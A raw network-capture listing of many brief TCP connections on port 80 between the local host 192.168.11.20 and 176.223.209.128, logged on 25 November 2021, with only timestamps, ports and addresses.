Nov 25, 2021 10:54:21.770970106 CET	80	50585	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:21.771142960 CET	50585	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:21.771192074 CET	50585	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:21.805423975 CET	80	50585	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.175744057 CET	50586	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.209172010 CET	80	50586	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.209400892 CET	50586	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.210906029 CET	50586	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.244162083 CET	80	50586	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.244421959 CET	50586	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.277781963 CET	80	50586	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.301152945 CET	80	50586	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.301202059 CET	80	50586	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.301367044 CET	50586	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.301414013 CET	50586	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.334871054 CET	80	50586	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.669207096 CET	50587	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.703238010 CET	80	50587	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.703547955 CET	50587	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.705040932 CET	50587	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.739049911 CET	80	50587	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.739272118 CET	50587	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.773397923 CET	80	50587	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.796283007 CET	80	50587	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.796333075 CET	80	50587	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:22.796581030 CET	50587	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.796644926 CET	50587	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:22.830667019 CET	80	50587	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.193614006 CET	50588	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.227741003 CET	80	50588	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.227969885 CET	50588	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.229444981 CET	50588	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.263454914 CET	80	50588	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.263679028 CET	50588	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.297774076 CET	80	50588	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.315236092 CET	80	50588	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.315284967 CET	80	50588	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.315454960 CET	50588	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.315504074 CET	50588	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.349539042 CET	80	50588	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.687628984 CET	50589	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.721033096 CET	80	50589	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.721179962 CET	50589	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.722718000 CET	50589	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.755999088 CET	80	50589	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.756190062 CET	50589	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.789530039 CET	80	50589	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.806195021 CET	80	50589	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.806243896 CET	80	50589	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:23.806452036 CET	50589	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.806488991 CET	50589	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:23.839915991 CET	80	50589	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.140439987 CET	50590	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.174192905 CET	80	50590	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.174459934 CET	50590	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.176004887 CET	50590	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.209876060 CET	80	50590	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.210030079 CET	50590	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.243963003 CET	80	50590	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.267311096 CET	80	50590	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.267359972 CET	80	50590	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.267554998 CET	50590	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.267612934 CET	50590	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.301739931 CET	80	50590	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.652460098 CET	50591	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.685950994 CET	80	50591	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.686254025 CET	50591	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.687768936 CET	50591	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.721168995 CET	80	50591	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.721345901 CET	50591	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.754878998 CET	80	50591	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.774898052 CET	80	50591	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.774962902 CET	80	50591	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:24.775264025 CET	50591	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.775358915 CET	50591	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:24.809075117 CET	80	50591	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.173331976 CET	50592	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.207211018 CET	80	50592	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.207406044 CET	50592	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.208925962 CET	50592	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.242803097 CET	80	50592	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.242980957 CET	50592	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.277149916 CET	80	50592	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.299103975 CET	80	50592	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.299168110 CET	80	50592	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.299483061 CET	50592	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.299578905 CET	50592	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.333914995 CET	80	50592	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.682015896 CET	50593	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.715480089 CET	80	50593	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.715656042 CET	50593	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.717248917 CET	50593	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.750638008 CET	80	50593	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.750817060 CET	50593	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.784173965 CET	80	50593	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.801876068 CET	80	50593	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.801923990 CET	80	50593	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:25.802088976 CET	50593	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.802138090 CET	50593	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:25.835552931 CET	80	50593	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.192538977 CET	50594	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.226072073 CET	80	50594	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.226227045 CET	50594	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.227736950 CET	50594	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.261181116 CET	80	50594	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.261358023 CET	50594	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.294686079 CET	80	50594	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.314987898 CET	80	50594	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.315041065 CET	80	50594	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.315466881 CET	50594	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.315517902 CET	50594	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.348987103 CET	80	50594	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.620470047 CET	50595	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.654298067 CET	80	50595	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.654465914 CET	50595	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.656063080 CET	50595	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.689892054 CET	80	50595	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.690289021 CET	50595	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.724026918 CET	80	50595	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.741338968 CET	80	50595	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.741353989 CET	80	50595	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:26.741569996 CET	50595	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.741594076 CET	50595	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:26.775521994 CET	80	50595	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.147376060 CET	50596	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.181440115 CET	80	50596	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.181665897 CET	50596	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.183294058 CET	50596	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.217299938 CET	80	50596	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.217629910 CET	50596	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.251580000 CET	80	50596	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.268580914 CET	80	50596	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.268636942 CET	80	50596	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.268955946 CET	50596	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.269037962 CET	50596	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.303283930 CET	80	50596	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.647993088 CET	50597	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.681423903 CET	80	50597	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.681781054 CET	50597	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.683854103 CET	50597	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.717225075 CET	80	50597	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.717432022 CET	50597	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.750766039 CET	80	50597	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.766393900 CET	80	50597	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.766443014 CET	80	50597	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:27.766607046 CET	50597	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.766654968 CET	50597	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:27.800040960 CET	80	50597	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.129215002 CET	50598	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.163239002 CET	80	50598	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.163459063 CET	50598	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.164932013 CET	50598	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.198909998 CET	80	50598	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.199127913 CET	50598	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.233093977 CET	80	50598	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.250722885 CET	80	50598	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.250777960 CET	80	50598	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.251096964 CET	50598	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.251182079 CET	50598	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.285407066 CET	80	50598	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.638150930 CET	50599	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.671583891 CET	80	50599	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.671796083 CET	50599	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.673309088 CET	50599	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.706675053 CET	80	50599	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.706809998 CET	50599	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.740283012 CET	80	50599	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.756836891 CET	80	50599	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.756901979 CET	80	50599	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:28.757191896 CET	50599	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.757287979 CET	50599	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:28.790992022 CET	80	50599	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.140347004 CET	50600	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.173707962 CET	80	50600	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.173945904 CET	50600	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.175600052 CET	50600	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.208801031 CET	80	50600	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.209117889 CET	50600	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.242377996 CET	80	50600	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.258585930 CET	80	50600	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.258635044 CET	80	50600	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.258800030 CET	50600	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.258847952 CET	50600	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.292197943 CET	80	50600	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.597309113 CET	50601	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.631078959 CET	80	50601	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.631373882 CET	50601	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.632936001 CET	50601	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.666707993 CET	80	50601	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.666925907 CET	50601	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.700822115 CET	80	50601	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.716418028 CET	80	50601	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.716466904 CET	80	50601	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:29.716681957 CET	50601	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.716737032 CET	50601	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:29.750823975 CET	80	50601	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.026278973 CET	50602	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.059540033 CET	80	50602	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.059747934 CET	50602	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.061319113 CET	50602	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.094698906 CET	80	50602	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.094902992 CET	50602	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.128314018 CET	80	50602	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.147492886 CET	80	50602	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.147547960 CET	80	50602	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.147726059 CET	50602	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.147778988 CET	50602	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.181427002 CET	80	50602	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.545070887 CET	50603	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.579165936 CET	80	50603	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.579302073 CET	50603	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.580873013 CET	50603	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.614880085 CET	80	50603	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.615057945 CET	50603	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.649025917 CET	80	50603	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.665218115 CET	80	50603	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.665272951 CET	80	50603	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:30.665551901 CET	50603	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.665637016 CET	50603	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:30.699853897 CET	80	50603	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.063097000 CET	50604	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.097156048 CET	80	50604	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.097379923 CET	50604	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.098891973 CET	50604	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.132975101 CET	80	50604	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.133148909 CET	50604	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.167315006 CET	80	50604	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.184423923 CET	80	50604	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.184478998 CET	80	50604	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.184623003 CET	50604	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.184684992 CET	50604	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.218983889 CET	80	50604	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.577630043 CET	50605	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.611074924 CET	80	50605	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.611293077 CET	50605	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.612838030 CET	50605	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.646275997 CET	80	50605	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.646614075 CET	50605	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.680210114 CET	80	50605	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.704845905 CET	80	50605	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.704910994 CET	80	50605	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:31.705229044 CET	50605	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.705341101 CET	50605	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:31.739021063 CET	80	50605	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.083343029 CET	50606	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.117296934 CET	80	50606	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.117496014 CET	50606	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.118997097 CET	50606	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.152997971 CET	80	50606	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.153240919 CET	50606	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.187153101 CET	80	50606	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.204696894 CET	80	50606	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.204747915 CET	80	50606	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.204914093 CET	50606	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.204974890 CET	50606	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.238929987 CET	80	50606	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.521049976 CET	50607	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.554423094 CET	80	50607	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.554738045 CET	50607	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.556276083 CET	50607	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.589325905 CET	80	50607	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.589571953 CET	50607	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.622706890 CET	80	50607	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.638225079 CET	80	50607	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.638338089 CET	80	50607	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:32.638478994 CET	50607	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.638546944 CET	50607	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:32.671515942 CET	80	50607	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.021353006 CET	50608	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.055500984 CET	80	50608	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.055712938 CET	50608	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.057682991 CET	50608	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.091712952 CET	80	50608	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.091890097 CET	50608	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.125883102 CET	80	50608	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.142641068 CET	80	50608	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.142697096 CET	80	50608	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.142875910 CET	50608	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.142942905 CET	50608	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.177098036 CET	80	50608	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.522788048 CET	50609	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.556863070 CET	80	50609	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.557137966 CET	50609	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.558686972 CET	50609	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.592621088 CET	80	50609	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.592837095 CET	50609	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.626864910 CET	80	50609	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.644135952 CET	80	50609	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.644185066 CET	80	50609	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:33.644359112 CET	50609	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.644422054 CET	50609	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:33.678555965 CET	80	50609	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.044569016 CET	50610	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.078669071 CET	80	50610	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.078916073 CET	50610	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.080656052 CET	50610	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.114639997 CET	80	50610	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.114842892 CET	50610	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.149173975 CET	80	50610	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.165272951 CET	80	50610	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.165328026 CET	80	50610	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.165468931 CET	50610	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.165523052 CET	50610	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.199862957 CET	80	50610	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.553771973 CET	50611	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.587157965 CET	80	50611	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.587482929 CET	50611	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.588984966 CET	50611	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.622262955 CET	80	50611	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.622477055 CET	50611	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.655802965 CET	80	50611	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.671294928 CET	80	50611	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.671348095 CET	80	50611	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:34.671518087 CET	50611	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.671571970 CET	50611	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:34.705138922 CET	80	50611	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.054747105 CET	50612	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.088838100 CET	80	50612	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.088990927 CET	50612	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.090543985 CET	50612	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.124535084 CET	80	50612	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.124819994 CET	50612	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.158843040 CET	80	50612	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.179450035 CET	80	50612	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.179500103 CET	80	50612	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.179869890 CET	50612	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.179924011 CET	50612	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.213943005 CET	80	50612	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.531694889 CET	50613	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.565449953 CET	80	50613	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.565871954 CET	50613	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.567270041 CET	50613	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.601136923 CET	80	50613	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.601305008 CET	50613	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.635236025 CET	80	50613	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.651150942 CET	80	50613	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.651200056 CET	80	50613	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:35.651422977 CET	50613	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.651470900 CET	50613	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:35.685671091 CET	80	50613	176.223.209.128	192.168.11.20
